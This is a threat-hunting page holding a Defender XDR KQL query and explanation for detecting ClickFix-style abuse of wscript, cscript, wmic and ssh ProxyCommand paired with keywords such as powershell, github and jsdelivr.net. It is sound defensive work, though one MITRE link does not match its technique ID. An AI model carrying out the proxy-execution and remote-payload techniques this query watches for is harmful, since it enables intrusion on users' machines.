KQL Search

Query Details

HomeAI ToolsDevice Query

Click Fix Lo L Bin Abuse

Query

# *ClickFix LoLBin Abuse*

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title    | Link    |
| ---  | --- | --- |
| T1216.002 | System Script Proxy Execution: SyncAppvPublishingServer | https://attack.mitre.org/techniques/T1574/001/ |
| T1047 | Windows Management Instrumentation | https://attack.mitre.org/techniques/T1047/ | 

#### Description

This rule detects suspicious command-line activity involving several Windows executables (wscript.exe, cscript.exe, wmic.exe, ssh.exe) when combined with specific keywords. It looks for wscript.exe or cscript.exe executing 'SyncAppvPublishingServer.vbs', wmic.exe executing 'process', 'call', or 'create', or ssh.exe using 'ProxyCommand'. Additionally, the rule filters for command lines containing keywords like 'gal', 'i*x', 'gcm', '*stM*', 'jsdelivr.net', 'github', or 'powershell', which are often associated with malicious activity, obfuscation, or external resource loading.
#### Author <Optional>
- **Name: Benjamin Zulliger**
- **Github: https://github.com/benscha/KQLAdvancedHunting**
- **LinkedIn: https://www.linkedin.com/in/benjamin-zulliger/**

#### References
- https://www.linkedin.com/posts/mauricefielenbach_threathunting-dfir-cybersecurity-activity-7429953431588659200-c0zE


## Defender XDR
```KQL
//THX to Maurice Fielenbach https://www.linkedin.com/posts/mauricefielenbach_threathunting-dfir-cybersecurity-activity-7429953431588659200-c0zE/
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where (
    (FileName in~ ("wscript.exe", "cscript.exe") and ProcessCommandLine has "SyncAppvPublishingServer.vbs")
    or (FileName =~ "wmic.exe" and ProcessCommandLine has_any ("process", "call", "create"))
    or (FileName =~ "ssh.exe" and ProcessCommandLine has "ProxyCommand")
)
| where ProcessCommandLine has_any (
    "gal", "i*x",         
    "gcm", "*stM*",       
    "jsdelivr.net",       
    "github",             
    "powershell"          
)

```

Explanation

This query is designed to detect potentially malicious activities on Windows systems by monitoring specific command-line executions. It focuses on identifying suspicious use of certain Windows executables and keywords that are often associated with malicious behavior or obfuscation techniques. Here's a simplified breakdown:

  1. Time Frame: The query looks at events from the past 7 days.

  2. Targeted Executables:

    • wscript.exe or cscript.exe: These are Windows Script Host executables. The query checks if they are running a script named 'SyncAppvPublishingServer.vbs'.
    • wmic.exe: This is the Windows Management Instrumentation Command-line tool. The query checks if it is used with commands like 'process', 'call', or 'create'.
    • ssh.exe: This is the Secure Shell client. The query checks if it is used with the 'ProxyCommand' option.

  3. Suspicious Keywords: The query further filters the command lines to see if they contain any of the following keywords, which might indicate malicious activity:

    • "gal", "i*x", "gcm", "stM": These could be part of obfuscated commands or scripts.
    • "jsdelivr.net", "github": These are external resources that might be used to load malicious scripts or payloads.
    • "powershell": This is a powerful scripting language often used in attacks.

Overall, the query aims to identify suspicious command-line activities that could indicate abuse of legitimate Windows tools for malicious purposes, aligning with specific MITRE ATT&CK techniques.

Details

Benjamin Zulliger profile picture

Benjamin Zulliger

Released: February 23, 2026

Tables

DeviceProcessEvents

Keywords

DeviceProcessCommandLineFileNameTimestamp

Operators

//|where>=agoin~andhas=~orhas_any

Actions